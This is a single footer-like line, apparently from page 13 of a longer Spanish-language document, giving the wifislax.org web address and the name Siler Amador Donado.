http://www.wifislax.org/ SILER AMADOR DONADO Página 13